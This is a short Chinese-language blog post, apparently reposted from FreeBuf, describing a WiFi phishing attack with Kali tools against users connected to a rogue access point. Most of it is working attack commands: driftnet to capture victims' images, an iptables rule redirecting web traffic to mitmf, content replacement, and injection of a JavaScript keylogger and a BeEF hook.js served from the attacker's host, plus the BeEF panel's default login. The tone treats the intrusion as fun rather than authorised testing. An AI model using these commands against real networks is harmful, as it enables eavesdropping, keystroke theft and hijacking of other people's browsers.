Kali进行WiFi钓鱼测试

  • A+
所属分类:网络安全

图片嗅探

这是一个很好玩的功能

工具:driftnet

过程:

driftnet -i at0

然后程序会打开一个小窗口显示所有传输的图片:

Kali进行WiFi钓鱼测试

单击图片保存到/

当然可以开启 Adjunct mode:

driftnet -i at0 -a

直接保存图片并显示文件名。

Kali进行WiFi钓鱼测试

劫持Web流量

这个更好玩

工具:BEEF;mitmf;iptables

过程:

先把80端口的流量劫持走(这里10000是mitmf默认监听端口)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

然后打开mitmf

mitmf -i at0 --replace --search-str aaaaa  --replace-str bbbbb#把所有网页中的aaaaa替换成bbbbb

Kali进行WiFi钓鱼测试

上图百度了aaaaa

好吧不要恶作剧了,上干货

mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger

mitmf在这里注入了js键盘记录器

Kali进行WiFi钓鱼测试

和beef的攻击测试脚本,其余的攻击方式(比如javapwn)可以参考http://www.freebuf.com/tools/45796.html

最后用BEEF测试用户浏览器吧!

/usr/share/beef-xss/beef

浏览器打开http://127.0.0.1:3000/ui/panel ,初始用户名和密码都是beef

Kali进行WiFi钓鱼测试

BEEF过于高深我还没玩得很清楚请大家自行探索

(摘自freebuf。piece of the past )

http://www.freebuf.com/articles/wireless/69840.html

http://4i.ee/qNXP3

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: